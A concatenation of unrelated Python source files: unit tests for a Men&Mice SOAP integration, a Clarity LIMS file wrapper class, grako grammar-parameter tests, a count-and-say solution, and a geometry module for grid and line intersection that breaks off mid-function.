connection['server'],
connection['wsdl_endpoint']))
wsdl_url = action.build_wsdl_url(connection)
self.assertEquals(wsdl_url, expected_url)
def test_build_wsdl_url_port(self):
action = self.get_action_instance({})
connection = {'transport': 'https',
'server': 'menandmice.domain.tld',
'port': 8443,
'wsdl_endpoint': '_mmwebext/mmwebext.dll?wsdl'}
expected_url = ("{0}://{1}:{2}/{3}?server=localhost".
format(connection['transport'],
connection['server'],
connection['port'],
connection['wsdl_endpoint']))
wsdl_url = action.build_wsdl_url(connection)
self.assertEquals(wsdl_url, expected_url)
def test_build_wsdl_url_missing_server(self):
action = self.get_action_instance({})
connection = {'transport': 'https',
'port': 8443,
'wsdl_endpoint': '_mmwebext/mmwebext.dll?wsdl'}
with self.assertRaises(RuntimeError):
action.build_wsdl_url(connection)
def test_login(self):
action = self.get_action_instance(self.config_good)
connection_name = 'base'
connection = self.config_good['menandmice'][connection_name]
expected_session = "expected_session"
mock_client = mock.Mock()
mock_client.service.Login.return_value = expected_session
result = action.login(mock_client, connection)
mock_client.service.Login.assert_called_with(server=connection['server'],
loginName=connection['username'],
password=connection['password'])
self.assertEquals(result, expected_session)
@mock.patch('run_operation.zeep.Client')
def test__pre_exec_kwargs(self, mock_client):
action = self.get_action_instance(self.config_blank)
kwargs_dict = {'operation': 'GetDNSViews',
'session': 'abc123',
'server': 'menandmice.domain.tld',
'username': 'user',
'password': 'pass',
'transport': 'http'}
kwargs_dict_extras = {'arg1': 'value1',
'arg2': 'value2'}
kwargs_dict.update(kwargs_dict_extras)
wsdl_url = ("http://{0}/_mmwebext/mmwebext.dll?wsdl?server=localhost"
.format(kwargs_dict['server']))
mock_client.return_value = 'mock client'
expected_context = {'kwargs_dict': kwargs_dict_extras,
'operation': kwargs_dict['operation'],
'session': kwargs_dict['session'],
'connection': {'connection': None,
'server': kwargs_dict['server'],
'username': kwargs_dict['username'],
'password': kwargs_dict['password'],
'transport': 'http',
'wsdl_endpoint': '_mmwebext/mmwebext.dll?wsdl'},
'wsdl_url': wsdl_url}
kwargs_dict_copy = copy.deepcopy(kwargs_dict)
result_context, result_client = action._pre_exec(**kwargs_dict_copy)
mock_client.assert_called_with(wsdl=wsdl_url)
self.assertEquals(result_client, mock_client.return_value)
self.assertEquals(result_context, expected_context)
@mock.patch('run_operation.zeep.Client')
@mock.patch('run_operation.zeep.transports.Transport')
def test__pre_exec_config(self, mock_transport, mock_client):
action = self.get_action_instance(self.config_good)
connection_name = 'full'
kwargs_dict = {'operation': 'GetDNSViews',
'session': None,
'connection': connection_name}
connection = self.config_good['menandmice'][connection_name]
kwargs_dict.update(connection)
connection['connection'] = connection_name
kwargs_dict_extras = {'arg1': 'value1',
'arg2': 'value2'}
kwargs_dict.update(kwargs_dict_extras)
wsdl_url = ("{0}://{1}:{2}/_mmwebext/mmwebext.dll?wsdl?server=localhost"
.format(kwargs_dict['transport'],
kwargs_dict['server'],
kwargs_dict['port']))
mock_client.return_value = 'mock client'
expected_context = {'kwargs_dict': kwargs_dict_extras,
'operation': kwargs_dict['operation'],
'session': kwargs_dict['session'],
'connection': connection,
'wsdl_url': wsdl_url}
kwargs_dict_copy = copy.deepcopy(kwargs_dict)
result_context, result_client = action._pre_exec(**kwargs_dict_copy)
mock_client.assert_called_with(transport=mock_transport.return_value, wsdl=wsdl_url)
self.assertEquals(result_client, mock_client.return_value)
self.assertEquals(result_context, expected_context)
def test__exec_session(self):
action = self.get_action_instance(self.config_blank)
expected_args = {'paramOneValue': 'value1',
'paramTwoValue': 'value2'}
context = {'kwargs_dict': {'param_one_value': 'value1',
'param_two_value': 'value2'},
'operation': 'GetDNSViews',
'session': 'abc123',
'connection': {'server': 'menandmice.domain.tld',
'username': 'user',
'password': 'pass'}}
expected_result = "abc"
mock_operation = mock.Mock()
mock_operation.return_value = expected_result
mock_client = mock.MagicMock()
mock_client.service.Login.return_value = False
mock_client.service.__getitem__.return_value = mock_operation
result = action._exec(context, mock_client)
self.assertFalse(mock_client.service.Login.called)
mock_client.service.__getitem__.assert_called_with(context['operation'])
mock_operation.assert_called_with(session=context['session'],
**expected_args)
self.assertEquals(result, expected_result)
def test__exec_login(self):
action = self.get_action_instance(self.config_blank)
expected_args = {'paramOneValue': 'value1',
'paramTwoValue': 'value2'}
context = {'kwargs_dict': {'param_one_value': 'value1',
'param_two_value': 'value2'},
'operation': 'GetDNSViews',
'session': None,
'connection': {'server': 'menandmice.domain.tld',
'username': 'user',
'password': 'pass'}}
expected_result = "abc"
expected_session = "abc123"
mock_operation = mock.Mock()
mock_operation.return_value = expected_result
mock_client = mock.MagicMock()
mock_client.service.Login.return_value = expected_session
mock_client.service.__getitem__.return_value = mock_operation
result = action._exec(context, mock_client)
mock_client.service.Login.assert_called_with(server=context['connection']['server'],
loginName=context['connection']['username'],
password=context['connection']['password'])
mock_client.service.__getitem__.assert_called_with(context['operation'])
mock_operation.assert_called_with(session=expected_session,
**expected_args)
self.assertEquals(result, expected_result)
def test__exec_login_bad_connection(self):
action = self.get_action_instance(self.config_blank)
context = {'kwargs_dict': {'param_one_value': 'value1',
'param_two_value': 'value2'},
'operation': 'GetDNSViews',
'session': None,
'connection': {'server': 'menandmice.domain.tld'}}
mock_client = mock.Mock()
with self.assertRaises(KeyError):
action._exec(context, mock_client)
def test__post_exec(self):
logging.disable(logging.CRITICAL)
action = self.get_action_instance(self.config_blank)
client = zeep.Client(wsdl="./etc/menandmice_wsdl_2017_06_26.xml")
expected = {"adForest": [{"ref": "abc123",
"name": "forest_name",
"catalogServer": None,
"password": None,
"readOnly": None,
"userName": None}]}
type_class = client.get_type('ns0:ArrayOfADForest')
obj = type_class(adForest=[{'ref': expected['adForest'][0]['ref'],
'name': expected['adForest'][0]['name']}])
result = action._post_exec(obj)
self.assertEquals(result, expected)
@mock.patch("run_operation.RunOperation._post_exec")
@mock.patch("run_operation.RunOperation._exec")
@mock.patch("run_operation.RunOperation._pre_exec")
def test_run(self, mock__pre_exec, mock__exec, mock__post_exec):
action = self.get_action_instance(self.config_blank)
kwargs_dict = {'username': 'user',
'password': 'pass'}
context = "context"
client = "client"
exec_result = "exec result"
post_exec_result = "post exec result"
mock__pre_exec.return_value = (context, client)
mock__exec.return_value = exec_result
mock__post_exec.return_value = post_exec_result
result = action.run(**kwargs_dict)
mock__pre_exec.assert_called_with(**kwargs_dict)
mock__exec.assert_called_with(context, client)
mock__post_exec.assert_called_with(exec_result)
self.assertEquals(result, post_exec_result)
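# Hedged sketch (not part of the pack's test-suite): a minimal snake-to-camel
# conversion consistent with the two snake_to_camel tests above. The real
# RunOperation implementation may differ; the DHCP special-casing is an
# assumption inferred from test_snake_to_camel_exclude_dhcp.
def _snake_to_camel_sketch(snake):
    special = {'dhcp': 'DHCP'}
    parts = snake.split('_')
    return parts[0] + ''.join(special.get(p, p.capitalize()) for p in parts[1:])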
|
# Copyright 2016 Semaphore Solutions, Inc.
# ---------------------------------------------------------------------------
from ._internal import ClarityElement
from six import BytesIO, StringIO, string_types
import logging
import os
from . import ETree
from ._internal.props import subnode_property
from .exception import FileNotFoundException
from s4.clarity import types
log = logging.getLogger(__name__)
class File(ClarityElement):
"""
This is a file in Clarity. It is also a Python file (more or less).
You can read, write, and do everything else you can normally do with a Python file.
    NOTE: nothing will be committed to Clarity until you call close() or commit().
"""
UNIVERSAL_TAG = "{http://genologics.com/ri/file}file"
def __init__(self, lims, uri=None, xml_root=None, name=None, limsid=None):
super(File, self).__init__(lims, uri, xml_root, name, limsid)
self._data = None
self._dirty = False
self.content_type = 'text/plain'
self.writeable = True
self.only_write_locally = False
self.mode = "r"
@classmethod
def new_empty(cls, attachment_point_element, name=None):
"""
Create a new empty :class:`File`.
:param attachment_point_element: An element to attach the file to.
:type attachment_point_element: ClarityElement
:param name: A name for the file.
:type name: str
:rtype: File
"""
root = ETree.Element(cls.UNIVERSAL_TAG)
f = File(uri=None, xml_root=root, lims=attachment_point_element.lims)
if name is not None:
f.name = name
f.attached_to = attachment_point_element.uri
return f
@classmethod
def new_from_local(cls, attachment_point_element, local_file_path, mode="r+b"):
"""
Create a new :class:`File` from a local file.
:param attachment_point_element: An element to attach the file to.
:type attachment_point_element: ClarityElement
:param local_file_path: Path to the local file.
:type local_file_path: str
:param mode: Mode to open the file with.
:type mode: str
:rtype: File
"""
root = ETree.Element(cls.UNIVERSAL_TAG)
f = File(uri=None, xml_root=root, lims=attachment_point_element.lims)
f.name = local_file_path
f.attached_to = attachment_point_element.uri
f._data = open(local_file_path, mode)
f._dirty = True
return f
name = subnode_property('original-location')
attached_to = subnode_property('attached-to')
content_location = subnode_property('content-location')
is_published = subnode_property('is-published', typename=types.BOOLEAN)
@property
def is_binary_mode(self):
"""
:type: bool
"""
return "b" in self.mode
def pipe_to(self, target_file_object):
"""
:raises FileNotFoundException: if the file does not exist in Clarity.
"""
response = self.lims.raw_request('GET', self.uri + '/download')
self.content_type = response.headers.get("Content-Type")
if self.is_binary_mode:
file_contents = response.content
else:
file_contents = response.content if isinstance(response.content, string_types) else response.text
target_file_object.write(file_contents)
def replace_and_commit_from_local(self, local_file_path, content_type='text/plain', mode="r+b"):
self.mode = mode
other_file = open(local_file_path, self.mode)
self.replace_and_commit(other_file, local_file_path, content_type)
other_file.close()
def replace_and_commit(self, stream, name, content_type='text/plain'):
if not self.writeable:
raise Exception("file not writeable")
self.name = name
self.data.write(stream.read())
self.content_type = content_type
self._dirty = True
self.commit()
@property
def data(self):
"""
:return: The file data IO stream.
:rtype: io.IOBase
"""
if self._data is None:
if self.only_write_locally:
pathstrippedname = os.path.basename(self.name)
if os.path.exists(self.name):
file_name = self.name
else:
file_name = pathstrippedname
self._data = open(file_name, self.mode)
else:
self._data = BytesIO() if self.is_binary_mode else StringIO()
if self.uri is not None:
try:
log.debug("Getting file contents from lims...")
# convenient!
self.pipe_to(self._data)
self._data.seek(0)
except FileNotFoundException:
log.debug("File not found at %s" % self.uri)
# this is ok, we just leave the buffer empty.
# uri = None means we will need a new uri, later, allocated through glsstorage.
self.uri = None
return self._data
# Implementation for standard io.IOBase methods to support being used as a file:
def read(self, n=-1):
return self.data.read(n)
def readline(self, length=None):
return self.data.readline(length)
def readlines(self, sizehint=0):
return self.data.readlines(sizehint)
def write(self, s):
if not self.writeable:
raise Exception("file not writeable")
self._dirty = True
return self.data.write(s)
def writelines(self, iterable):
if not self.writeable:
raise Exception("file not writeable")
self._dirty = True
return self.data.writelines(iterable)
def flush(self):
# don't do anything at all
return
def getvalue(self):
return self.data.getvalue()
def truncate(self, size=None):
if not self.writeable:
raise Exception("file not writeable")
self._dirty = True
if size is None and self._data is None:
self._data = BytesIO() if self.is_binary_mode else StringIO()
else:
self._data.truncate(size)
def tell(self):
return self.data.tell()
def isatty(self):
return False
def close(self):
"""
Commit the file and close the data stream.
"""
self.commit()
return self.data.close()
def __iter__(self):
return self.data.__iter__()
def seek(self, pos, mode=0):
return self.data.seek(pos, mode)
def readable(self):
return self.data.readable()
def writable(self):
return self.data.writable()
def seekable(self):
return self.data.seekable()
# end file-like functions
def seek_to_end(self):
return self.data.seek(0, 2)
def commit(self):
if not self.writeable or self._data is None:
return
if self.only_write_locally:
self._data.flush()
return
if self.name is None:
raise Exception("Value for .name required.")
if self.uri is not None:
# If we are overwriting an existing file, first delete to
# allow name to be changed.
self.lims.raw_request('DELETE', self.uri)
self.uri = None
# first we get an allocation from glsstorage
self.post_and_parse(self.lims.root_uri + '/glsstorage')
# then we post ourselves to files, which gives us a uri.
self.post_and_parse(self.lims.root_uri + '/files')
if self._dirty:
old_pos = self.data.tell()
self.data.seek(0)
self.lims.raw_request('POST', self.uri + '/upload',
files={'file': (self.name, self.data, self.content_type)}
)
self._dirty = False
self.data.seek(old_pos)
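# Hedged usage sketch (illustrative only; `step` and the local path are
# assumptions, not part of this module): attach a local CSV to a Clarity
# element and push it to the server in one go.
def _example_attach_local_file(step):
    f = File.new_from_local(step, "./results.csv", mode="rb")
    f.content_type = "text/csv"
    f.commit()
    return f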
|
__all__ = [
"ATOMIC_RADII",
"KHOT_EMBEDDINGS",
"CONTINUOUS_EMBEDDINGS",
"MAX_ATOMIC_NUM",
]
from .atomic_radii import ATOMIC_RADII
from .continuous_embeddings import CONTINUOUS_EMBEDDINGS
from .khot_embeddings import KHOT_EMBEDDINGS
MAX_ATOMIC_NUM = 100
|
class Solution:
def nth(self, n: int, verbose=False):
if n == 1:
return "1"
if n == 2:
return "11"
s = "11"
for i in range(3, n + 1):
if verbose:
print(s)
s += "$"
l = len(s)
cnt = 1
tmp = ""
for j in range(1, l):
if s[j] != s[j - 1]:
                    tmp += str(cnt)
tmp += s[j - 1]
cnt = 1
else:
cnt += 1
s = tmp
return s
print(Solution().nth(6))
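# Hedged alternative sketch: the same "count and say" step can be written with
# itertools.groupby, which avoids the "$" sentinel used above.
import itertools

def nth_with_groupby(n):
    s = "1"
    for _ in range(n - 1):
        s = "".join(str(len(list(group))) + digit for digit, group in itertools.groupby(s))
    return s

assert nth_with_groupby(6) == Solution().nth(6)  # both give "312211"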
|
# -*- coding: utf-8 -*-
# Copyright (C) 2017 by Juancarlo Añez
# Copyright (C) 2012-2016 by Juancarlo Añez and Thomas Bragg
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
from grako.parser import GrammarGenerator
from grako.tool import compile
from grako.util import trim, ustr, PY3
from grako.codegen import codegen
class ParameterTests(unittest.TestCase):
def test_keyword_params(self):
grammar = '''
start(k1=1, k2=2)
=
{'a'} $
;
'''
g = GrammarGenerator('Keywords')
model = g.parse(grammar, trace=False)
code = codegen(model)
self.assertEqual('#!/usr/bin/env python', code.splitlines()[0])
pass
def test_35_only_keyword_params(self):
grammar = '''
rule(kwdA=A, kwdB=B)
=
'a'
;
'''
model = compile(grammar, "test")
self.assertEqual(trim(grammar), ustr(model))
def test_36_params_and_keyword_params(self):
grammar = '''
rule(A, kwdB=B)
=
'a'
;
'''
model = compile(grammar, "test")
self.assertEqual(trim(grammar), ustr(model))
def test_36_param_combinations(self):
def assert_equal(target, value):
self.assertEqual(target, value)
class TC36Semantics(object):
"""Check all rule parameters for expected types and values"""
def rule_positional(self, ast, p1, p2, p3, p4):
assert_equal("ABC", p1)
assert_equal(123, p2)
assert_equal('=', p3)
assert_equal("+", p4)
return ast
def rule_keyword(self, ast, k1, k2, k3, k4):
assert_equal("ABC", k1)
assert_equal(123, k2)
assert_equal('=', k3)
assert_equal('+', k4)
return ast
def rule_all(self, ast, p1, p2, p3, p4, k1, k2, k3, k4):
assert_equal("DEF", p1)
assert_equal(456, p2)
assert_equal('=', p3)
assert_equal("+", p4)
assert_equal("HIJ", k1)
assert_equal(789, k2)
assert_equal('=', k3)
assert_equal('+', k4)
return ast
grammar = '''
@@ignorecase::False
@@nameguard
start
= {rule_positional | rule_keywords | rule_all} $ ;
rule_positional('ABC', 123, '=', '+')
= 'a' ;
rule_keywords(k1=ABC, k3='=', k4='+', k2=123)
= 'b' ;
rule_all('DEF', 456, '=', '+', k1=HIJ, k3='=', k4='+', k2=789)
= 'c' ;
'''
pretty = '''
@@ignorecase :: False
@@nameguard :: True
start
=
{rule_positional | rule_keywords | rule_all} $
;
rule_positional(ABC, 123, '=', '+')
=
'a'
;
rule_keywords(k1=ABC, k3='=', k4='+', k2=123)
=
'b'
;
rule_all(DEF, 456, '=', '+', k1=HIJ, k3='=', k4='+', k2=789)
=
'c'
;
'''
model = compile(grammar, 'RuleArguments')
self.assertEqual(trim(pretty), ustr(model))
model = compile(pretty, 'RuleArguments')
ast = model.parse("a b c")
self.assertEqual(['a', 'b', 'c'], ast)
semantics = TC36Semantics()
ast = model.parse("a b c", semantics=semantics)
self.assertEqual(['a', 'b', 'c'], ast)
codegen(model)
def test_36_unichars(self):
grammar = '''
start = { rule_positional | rule_keywords | rule_all }* $ ;
rule_positional("ÄÖÜäöüß") = 'a' ;
rule_keywords(k1='äöüÄÖÜß') = 'b' ;
rule_all('ßÄÖÜäöü', k1="ßäöüÄÖÜ") = 'c' ;
'''
def _trydelete(pymodule):
import os
try:
os.unlink(pymodule + ".py")
except EnvironmentError:
pass
try:
os.unlink(pymodule + ".pyc")
except EnvironmentError:
pass
try:
os.unlink(pymodule + ".pyo")
except EnvironmentError:
pass
def assert_equal(target, value):
self.assertEqual(target, value)
class UnicharsSemantics(object):
"""Check all rule parameters for expected types and values"""
def rule_positional(self, ast, p1):
assert_equal("ÄÖÜäöüß", p1)
return ast
def rule_keyword(self, ast, k1):
assert_equal("äöüÄÖÜß", k1)
return ast
def rule_all(self, ast, p1, k1):
assert_equal("ßÄÖÜäöü", p1)
assert_equal("ßäöüÄÖÜ", k1)
return ast
m = compile(grammar, "UnicodeRuleArguments")
ast = m.parse("a b c")
self.assertEqual(['a', 'b', 'c'], ast)
semantics = UnicharsSemantics()
ast = m.parse("a b c", semantics=semantics)
self.assertEqual(['a', 'b', 'c'], ast)
code = codegen(m)
import codecs
with codecs.open("tc36unicharstest.py", "w", "utf-8") as f:
f.write(code)
import tc36unicharstest
tc36unicharstest
_trydelete("tc36unicharstest")
def test_numbers_and_unicode(self):
grammar = '''
rúle(1, -23, 4.56, 7.89e-11, 0xABCDEF, Añez)
=
'a'
;
'''
rule2 = '''
rulé::Añez
=
'\\xf1'
;
'''
rule3 = '''
rúlé::Añez
=
'ñ'
;
'''
if PY3:
grammar += rule3
else:
grammar += rule2
model = compile(grammar, "test")
self.assertEqual(trim(grammar), ustr(model))
|
"""
geometry
~~~~~~~~
Methods to help with geometry work. Uses `shapely`.
"""
import numpy as _np
import math as _math
from . import data as _data
import logging as _logging
# For what we use this for, we could use e.g. binary search; but why re-invent
# the wheel?
import scipy.optimize as _optimize
_logger = _logging.getLogger(__name__)
try:
import shapely.geometry as _geometry
except Exception:
_logger.error("Failed to import `shapely`.")
_geometry = None
def configure_gdal():
"""On windows, I have found that by default, the GDAL_DATA environment
variable is not set. One solution is to always use the (for example)
Anaconda Prompt instead of the usual Command Prompt. Another is to
correctly set the variable programmatically, which is what this function
does. You can tell if this is a problem by noticing the message:
> ERROR 4: Unable to open EPSG support file gcs.csv.
> Try setting the GDAL_DATA environment variable to point to the
> directory containing EPSG csv files.
Appearing on stderr when you use e.g. geopandas.
"""
import os, sys
if "GDAL_DATA" in os.environ:
_logger.debug("GDAL_DATA already set so nothing to do.")
return
_logger.info("GDAL_DATA not set, so searching...")
if sys.platform.startswith("linux"):
_logger.info("However, platform is linux, so assuming we'll be okay...")
return
choices = _find_gdal_choices()
if len(choices) == 1:
_logger.info("Set GDAL_DATA = '%s'", choices[0])
os.environ["GDAL_DATA"] = choices[0]
else:
_logger.error("Found too many choices for setting GDAL_DATA: %s", str(choices))
def _find_gdal_choices():
import os, sys
choices = []
for path, _, _ in os.walk(sys.exec_prefix):
if path.endswith("gdal"):
choices.append(path)
library_choices = [x for x in choices if x.lower().find("library") > -1
and x.lower().find("pkgs") == -1 and _contains_csv(x)]
if len(library_choices) == 1:
return library_choices
return choices
def _contains_csv(path):
import os
csvs = [x for x in os.listdir(path) if x.endswith(".csv")]
return len(csvs) > 1
def grid_intersection(geometry, grid):
"""Find the collection of grid cells which intersect with the geometry.
Here "intersect" means "intersects with non-zero area", so grid cells just
touching the geometry will not be returned.
:param geometry: Geometry object to intersect with.
:param grid: Instance of :class:`Grid` describing the grid.
:return: List of pairs (x,y) of grid cells which intersect.
"""
minx, miny, maxx, maxy = geometry.bounds
xstart = int(_np.floor((minx - grid.xoffset) / grid.xsize))
xend = int(_np.floor((maxx - grid.xoffset) / grid.xsize))
ystart = int(_np.floor((miny - grid.yoffset) / grid.ysize))
yend = int(_np.floor((maxy - grid.yoffset) / grid.ysize))
intersections = []
for y in range(ystart, yend + 1):
yy = grid.yoffset + y * grid.ysize
for x in range(xstart, xend + 1):
xx = grid.xoffset + x * grid.xsize
poly = _geometry.Polygon([[xx, yy], [xx + grid.xsize, yy],
[xx + grid.xsize, yy + grid.ysize], [xx, yy + grid.ysize]])
poly = poly.intersection(geometry)
if not poly.is_empty and poly.area > 0:
intersections.append((x, y))
return intersections
def mask_grid_by_intersection(geometry, grid):
"""Generate a :class:`MaskedGrid` by intersecting the grid with the
geometry. The returned grid may have a different x/y offset, so that it
can contain all grid cells which intersect with the geometry. However,
the "relative offset" will be unchanged (so that the difference between the
x offsets will be a multiple of the grid width, and the same for y).
:param geometry: Geometry object to intersect with.
:param grid: The :class:`Grid` instance describing the grid.
"""
minx, miny, maxx, maxy = geometry.bounds
xstart = int(_np.floor((minx - grid.xoffset) / grid.xsize))
xend = int(_np.floor((maxx - grid.xoffset) / grid.xsize))
ystart = int(_np.floor((miny - grid.yoffset) / grid.ysize))
yend = int(_np.floor((maxy - grid.yoffset) / grid.ysize))
width = xend - xstart + 1
height = yend - ystart + 1
    mask = _np.empty((height, width), dtype=bool)  # plain bool: _np.bool is deprecated in newer numpy
xo = grid.xoffset + xstart * grid.xsize
yo = grid.yoffset + ystart * grid.ysize
import shapely.prepared
geo = shapely.prepared.prep(geometry)
for y in range(height):
yy = yo + y * grid.ysize
polys = [_geometry.Polygon([[xo + x * grid.xsize, yy],
[xo + x * grid.xsize + grid.xsize, yy],
[xo + x * grid.xsize + grid.xsize, yy + grid.ysize],
[xo + x * grid.xsize, yy + grid.ysize]])
for x in range(width)]
mask[y] = _np.asarray([not geo.intersects(poly) for poly in polys])
return _data.MaskedGrid(grid.xsize, grid.ysize, xo, yo, mask)
def mask_grid_by_points_intersection(timed_points, grid, bbox=False):
"""Generate a :class:`MaskedGrid` by intersecting the grid with collection
of points.
:param timed_points: Instance of :class:`TimedPoints` (or other object with
`xcoords` and `ycoords` attributes).
:param grid: The :class:`Grid` instance describing the grid.
:param bbox: If `True` then return the smallest rectangle containing the
points. If `False` then just return the grid cells which contain at
        least one point.
"""
xcs = _np.asarray(timed_points.xcoords)
ycs = _np.asarray(timed_points.ycoords)
minx, maxx = _np.min(xcs), _np.max(xcs)
miny, maxy = _np.min(ycs), _np.max(ycs)
xstart = int(_np.floor((minx - grid.xoffset) / grid.xsize))
xend = int(_np.floor((maxx - grid.xoffset) / grid.xsize))
ystart = int(_np.floor((miny - grid.yoffset) / grid.ysize))
yend = int(_np.floor((maxy - grid.yoffset) / grid.ysize))
width = xend - xstart + 1
height = yend - ystart + 1
    mask = _np.zeros((height, width), dtype=bool)
xo = grid.xoffset + xstart * grid.xsize
yo = grid.yoffset + ystart * grid.ysize
if not bbox:
def intersect(xx, yy):
mask = ( (xcs >= xx) & (ycs >= yy)
& (xcs <= (xx+grid.xsize)) & (ycs <= (yy+grid.ysize)) )
return _np.any(mask)
for y in range(height):
yy = yo + y * grid.ysize
for x in range(width):
xx = xo + x * grid.xsize
if not intersect(xx, yy):
mask[y][x] = True
return _data.MaskedGrid(grid.xsize, grid.ysize, xo, yo, mask)
def intersect_timed_points(timed_points, geo):
"""Intersect the :class:`TimedPoints` data with the geometry, using
`shapely`.
:param timed_points: Instance of :class:`TimedPoints`
:param geo: A geometry object
:return: Instance of :class:`TimedPoints`
"""
points = [ (x,y) for x,y in zip(timed_points.xcoords, timed_points.ycoords) ]
mp = _geometry.MultiPoint(points)
mp = mp.intersection(geo)
# type of mp: <class 'shapely.geometry.multipoint.MultiPoint'>
# type of np-asarray-mp: <class 'numpy.ndarray'>
# shape of np-asarray-mp: (23653, 2)
# type of pt in _np.asarray(mp): <class 'numpy.ndarray'>
# shape of pt in _np.asarray(mp): (2,)
# NOTE: The slicing "[:,:2]" in this next line was added because
# using some geojson files somehow resulted in points with 3
# dimensions here, immediately after the above "mp.intersection(geo)"
# line. Forcing the slice here to only take the first 2 dimensions
# is a workaround until that bug can be understood and fixed.
points_we_want = set(tuple(pt) for pt in _np.asarray(mp)[:,:2])
#points_we_want = set(tuple(pt) for pt in _np.asarray(mp))
mask = [pt in points_we_want for pt in points]
    mask = _np.array(mask, dtype=bool)
return timed_points[mask]
#############################################################################
# Point and line geometry
#############################################################################
def _project_point_to_line(point, line):
"""Assumes line is only 2 points
"""
v = line[1] - line[0]
x = point - line[0]
t = _np.dot(x, v) / _np.dot(v, v)
if t <= 0:
return line[0]
if t >= 1:
return line[1]
return line[0] + t * v
def project_point_to_line(point, line):
"""Find the closest point on the line segment to the point.
    :param point: Pair `(x,y)`
:param line: A single linear segment, `[ [x_1,y_1], [x_2,y_2], ...,
[x_n,y_n] ]`. This ordering is compatible with `shapely` (and not
compatible with our own code!)
"""
point = _np.asarray(point)
if len(point.shape) == 2:
if point.shape[0] != 1:
raise ValueError("Need a single point")
point = point[0]
if point.shape != (2,):
raise ValueError("Point should be (x,y)")
line = _np.asarray(line)
if len(line.shape) != 2 or line.shape[0] < 2 or line.shape[1] != 2:
raise ValueError("Line should be ((x_1,y_1), ..., (x_n,y_n))")
options = [ _project_point_to_line(point, line[i:i+2,:])
for i in range(line.shape[0] - 1) ]
if line.shape[0] == 2:
return options[0]
distsq = [_np.sum((point - opt)**2) for opt in options]
return options[_np.argmin(distsq)]
def project_point_to_lines(point, lines):
"""Find the closest point on one of the line segments to the point.
    :param point: Pair `(x,y)`
    :param lines: A list of linear segments (see :func:`project_point_to_line`).
"""
point = _np.asarray(point)
options = [project_point_to_line(point, line) for line in lines]
distsq = [_np.sum((point - opt)**2) for opt in options]
return options[_np.argmin(distsq)]
def project_point_to_lines_shapely(point, lines):
"""As :func:`project_point_to_lines` but uses `shapely` at a first pass.
:param point: Pair `(x,y)`
:param lines: A list of :class:`shapely.geometry.LineString` objects.
"""
pt = _geometry.Point(point)
dists = _np.asarray([line.distance(pt) for line in lines])
line = lines[dists.argmin()]
return project_point_to_line(point, line.coords)
def intersect_line_box(start, end, box_bounds):
"""Intersect a line with a rectangular box. The box is "half-open", so
only the top and left boundary edges are considered part of the box. If
    the line only intersects the box in a single point, we treat this as no
    intersection.
:param start: Pair `(x,y)` of the start of the line segment
:param end: Pair `(x,y)` of the end of the line segment
:param box_bounds: `(xmin, ymin, xmax, ymax)` of the box. Formally, the
box is those `(x,y)` with `xmin <= x < xmax` and `ymin <= y < ymax`.
:return: `None` or `(t1, t2)` where `start * (1-t) + end * t` is
in the box for `t1 < t < t2`.
"""
dx, dy = end[0] - start[0], end[1] - start[1]
xmin, ymin, xmax, ymax = tuple(box_bounds)
if xmin >= xmax or ymin >= ymax:
raise ValueError("Not a valid box")
if _np.abs(dx) < 1e-10:
# Vertical line
if not ( xmin <= start[0] and start[0] < xmax ):
return None
if _np.abs(dy) < 1e-10:
# Must be point
if not ( ymin <= start[1] and start[1] < ymax ):
return None
return (0, 1)
else:
c, d = ymin - start[1], ymax - start[1]
if dy > 0:
c, d = c / dy, d / dy
else:
c, d = d / dy, c / dy
return max(0, c), min(1, d)
elif _np.abs(dy) < 1e-10:
# (Proper) Horizontal line
if not ( ymin <= start[1] and start[1] < ymax ):
return None
a, b = xmin - start[0], xmax - start[0]
if dx > 0:
a, b = a / dx, b / dx
else:
a, b = b / dx, a / dx
return max(0, a), min(1, b)
else:
# Line in general position
a, b = xmin - start[0], xmax - start[0]
if dx > 0:
a, b = a / dx, b / dx
else:
a, b = b / dx, a / dx
c, d = ymin - start[1], ymax - start[1]
if dy > 0:
c, d = c / dy, d / dy
else:
c, d = d / dy, c / dy
tmin = max(a, c, 0)
tmax = min(b, d, 1)
if tmin < tmax:
return (tmin, tmax)
return None
def line_meets_geometry(geo, line):
"""Does the line intersect the geometry?
:param geo: `shapely` object
:param line: A line in the usual format, an iterable of points `(x,y)`
:return: True or False
"""
line = _geometry.LineString(list(line))
return geo.intersects(line)
def lines_which_meet_geometry(geo, lines):
"""Which of the lines intersect the geometry?
:param geo: `shapely` object
:param lines: An iterable of lines in the usual format: each an iterable of
points `(x,y)`
:return: List of True or False
"""
return [line_meets_geometry(geo, line) for line in lines]
def intersect_line_grid_most(line, grid):
"""Intersect a line with a grid. Finds the grid cell which contains the
    largest fraction of the line (which may be an _arbitrary_ choice if more
    than one grid cell ties).
:param line: `((x1,y1), (x2,y2))`
:param grid: Instance of :class:`data.Grid` or same interface.
:return: The grid cell `(gx, gy)` which contains most of the line.
"""
_, intervals = full_intersect_line_grid(line, grid)
best, length = None, None
for (gx, gy, t1, t2) in intervals:
t = t2 - t1
if length is None or t > length:
best, length = (gx, gy), t
return best
def intersect_line_grid(line, grid):
"""Intersect a line with a grid, returning the smallest set of new lines
which cover the original line and such that each new line segment lies
entirely within one grid cell.
:param line: `((x1,y1), (x2,y2))`
:param grid: Instance of :class:`data.Grid` or same interface.
:return: List of line segments.
"""
segments, _ = full_intersect_line_grid(line, grid)
return segments
def full_intersect_line_grid(line, grid):
"""Intersect a line with a grid, returning the smallest set of new lines
which cover the original line and such that each new line segment lies
entirely within one grid cell.
:param line: `((x1,y1), (x2,y2))`
:param grid: Instance of :class:`data.Grid` or same interface.
:return: `(segments, intervals)` where `segments` is as
:meth:`intersect_line_grid_most` and `intervals` is a list of tuples
`(gx, gy, t1, t2)` telling that the line segment from (line coordinates)
`t1` to `t2` is in grid cell `gx, gy`. The ordering is the same as
`segments`.
"""
gx, gy = grid.grid_coord(*line[0])
if grid.grid_coord(*line[1]) == (gx, gy):
return [line], [(gx, gy, 0, 1)]
segments, intervals = [], []
start = (line[0][0] - grid.xoffset, line[0][1] - grid.yoffset)
end = (line[1][0] - grid.xoffset, line[1][1] - grid.yoffset)
search = start
delta = 1e-8
while True:
gx, gy = _math.floor(search[0] / grid.xsize), _math.floor(search[1] / grid.ysize)
bbox = (gx * grid.xsize, gy * grid.ysize, (gx+1) * grid.xsize, (gy+1) * grid.ysize)
intersects = intersect_line_box(start, end, bbox)
if intersects is None:
t2 = 0
else:
t1, t2 = intersects
segments.append((
